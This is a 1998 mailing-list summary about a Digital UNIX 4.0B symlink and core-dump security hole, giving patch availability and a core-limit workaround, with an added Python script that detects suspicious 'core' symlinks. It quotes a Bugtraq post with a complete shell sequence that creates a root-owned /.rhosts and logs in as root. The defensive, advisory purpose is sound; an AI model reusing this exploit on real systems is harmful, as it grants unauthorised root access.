SUMMARY: Symlink/Core Security Hole for DU 4.0B

From: Richard L Jackson Jr <rjackson_at_osf1.gmu.edu>
Date: Sat, 18 Apr 1998 15:57:04 -0400 (EDT)

Hello,

SUMMARY:
--------------------------------------------------------------------------------
The fix for this Digital UNIX 4.0B symbolic link and core file security
issue will be made publicly available, at
ftp://ftp.service.digital.com/public/Digital_UNIX/, in about one week
as patch kit #7, BL9. Digital CSC currently has an advance copy available
upon request if you have a support contract.

All of Digital UNIX 4.0B, pre-patch kit #7, and Digital UNIX 4.0D without
any patches are vulnerable. Digital UNIX 4.0D with patch kit #1 is not
vulnerable.
--------------------------------------------------------------------------------

-- 
Regards,
Richard Jackson
Computer Center Lead Engineer
Mgr, Central Systems & Dept. UNIX Consulting
University Computing & Information Systems (UCIS)
George Mason University, Fairfax, Virginia
RESPONSES:
--------------------------------------------------------------------------------
Dave Dula  dula_at_decatl.alf.dec.com
Richard Boren rich.boren_at_cxo.mts.dec.com
Saul Tannenbaum <stannenb_at_tufts.edu>
Mike Iglesias <iglesias_at_draco.acs.uci.edu>
Ryan Niemes <rwn_at_udayton.edu>
"John P.Speno" <speno_at_isc.upenn.edu>
Bugs Brouillard <bb1_at_axe.humboldt.edu>		<-- NEAT NAME
Andrew Leahy <A.Leahy_at_st.nepean.uws.edu.au>
Girish Phadke <PGIRISH_at_binariang.maxisnet.com.my>
Lucien_HERCAUD_at_paribas.com
Girish Phadke <PGIRISH_at_binariang.maxisnet.com.my>
--------------------------------------------------------------------------------
QUESTION:
--------------------------------------------------------------------------------
A couple of hours ago the below message was posted to bugtraq that
describes yet another way to use symbolic links and core dumps to gain
root access under Digital UNIX.  I contacted Digital CSC and was
informed there may not be a patch for Digital UNIX 4.0B at this time,
but the engineer suggested a workaround.  Basically, turn on Enhanced
C2 security and disable the creation of core files by adding
u_rlimit_core#0 to the user profile database -- this can be done with
dxaccounts or 'edauth -dp USER'.  It can also be done by doing the
above to your user templates, if defined.
I should hear from the engineer about the status of the security hole and
resolution by tomorrow.
I have only tested the hole with Digital UNIX 4.0B.
BUGTRAQ POST FROM rusty_at_mad.it:
----------------------------------------------------
Symlink problem in Digital Unix 4.0, discovered by |-ru5ty- and [SoReN]
(28/03/1998)
Starting 2 suid root programs in the background, and killing them with the -11
flag, we'll have a root-owned core with our gid and mode 600. Then a symlink
is enough to create a file anywhere... like /.rhosts.
rusty_at_mad.it soren_at_atlink.it
$ ls -l /.rhosts
/.rhosts not found
$ ls -l /usr/sbin/ping
-rwsr-xr-x   1 root     bin        32768 Nov 16  1996 /usr/sbin/ping
$ ln -s /.rhosts core
$ IMP='
>+ +
>'
$ ping somehost &
[1] 1337
$ ping somehost &
[2] 31337
$ kill -11 31337
[1]    Segmentation fault   /usr/sbin/ping somehost (core dumped)
[2]    +Segmentation fault   /usr/sbin/ping somehost (core dumped)
$ ls -l /.rhosts
-rw-------   1 root     system    385024 Mar 29 05:17 /.rhosts
 ##/.rhosts has been created....that's all.##
$ rlogin localhost -l root
It is a very serious problem; it needs a fix as soon as possible. In fact
we can have a DoS if we link our core to the kernel.
Other platforms:
SunOS         4.1.x, 5.5.x   Doesn't work
Linux         2.0.x          Doesn't work
Digital Unix  4.0d           Doesn't work
Others        (not tested yet)
----------------------------------------------------
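The quoted post depends on one precondition a defender can look for directly: a symbolic link named "core" left in a directory where a setuid program may later dump core, typically dangling (its target does not exist yet) and pointing outside its own directory at something like /.rhosts or the kernel image. The following audit helper is an added example written for this thread; it is not Digital's tooling and not part of either post. The list of sensitive paths and the file layout in the constructed sample records are assumptions.

```python
# Added audit helper for the symlink/core-dump issue discussed in this thread.
# Constructed example code, not Digital's tooling and not part of the original
# posts. It finds symlinks named "core" and reports the ones that look like
# the precondition in the quoted post: dangling, out-of-tree, or aimed at a
# sensitive path.
import os
import resource

# Paths a core file should never land on. This list is an assumption for the
# example; extend it for your own site.
SENSITIVE_PATHS = ("/.rhosts", "/etc", "/vmunix", "/genvmunix")


def _is_sensitive(abs_target):
    """True if abs_target is one of SENSITIVE_PATHS or lies underneath one."""
    return any(abs_target == p or abs_target.startswith(p + "/") for p in SENSITIVE_PATHS)


def classify_core_link(link_path, target, target_exists):
    """Return the reasons a 'core' symlink looks suspicious (empty list = benign).

    link_path      absolute path of the symlink itself
    target         raw link contents, as returned by os.readlink()
    target_exists  whether following the link reaches an existing file
    """
    link_dir = os.path.dirname(os.path.normpath(link_path))
    # Relative link contents are resolved against the link's own directory.
    abs_target = os.path.normpath(os.path.join(link_dir, target))
    reasons = []
    if not target_exists:
        reasons.append("dangling: target does not exist yet")
    if os.path.commonpath([link_dir, abs_target]) != link_dir:
        reasons.append("points outside its own directory")
    if _is_sensitive(abs_target):
        reasons.append("targets a sensitive path")
    return reasons


def suspicious_core_links(entries):
    """Filter (link_path, target, target_exists) records down to the suspicious ones.

    Returns a dict mapping link_path -> list of reasons; benign links are dropped.
    """
    findings = {}
    for link_path, target, target_exists in entries:
        reasons = classify_core_link(link_path, target, target_exists)
        if reasons:
            findings[link_path] = reasons
    return findings


def scan_tree(root):
    """Walk root (without following symlinks) and yield every symlink named 'core'."""
    for dirpath, dirnames, filenames in os.walk(os.path.abspath(root)):
        # A symlink to a directory shows up in dirnames, a symlink to a file in filenames.
        for name in dirnames + filenames:
            if name != "core":
                continue
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                # os.path.exists() follows the link, so False means it is dangling.
                yield (path, os.readlink(path), os.path.exists(path))


def core_dumps_disabled():
    """True if the current process has a zero soft core-file limit (ulimit -c 0).

    The thread's workaround sets this per user with u_rlimit_core#0 in the
    Enhanced C2 profile database; this only checks the calling shell's limit.
    """
    soft, _hard = resource.getrlimit(resource.RLIMIT_CORE)
    return soft == 0


if __name__ == "__main__":
    import sys
    # Constructed sample records mirroring the quoted post: a dangling link to
    # /.rhosts, a relative link to the kernel image, and a harmless local link.
    sample = [
        ("/home/alice/core", "/.rhosts", False),
        ("/tmp/x/core", "../../vmunix", False),
        ("/tmp/build/core", "core.real", True),
    ]
    entries = list(scan_tree(sys.argv[1])) if len(sys.argv) > 1 else sample
    for path, reasons in suspicious_core_links(entries).items():
        print(path + ": " + "; ".join(reasons))
    print("core dumps disabled for this shell:", core_dumps_disabled())
```

Run it with a directory argument (for example a home or scratch partition) to scan a real tree, or with no arguments to see the constructed records classified. A dangling "core" link that points outside its directory is the case to chase first; a link to an existing file inside the same directory is usually a developer's own redirection and can be ignored.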
Received on Sat Apr 18 1998 - 21:58:05 NZST

This archive was generated by hypermail 2.4.0 : Wed Nov 08 2023 - 11:53:37 NZDT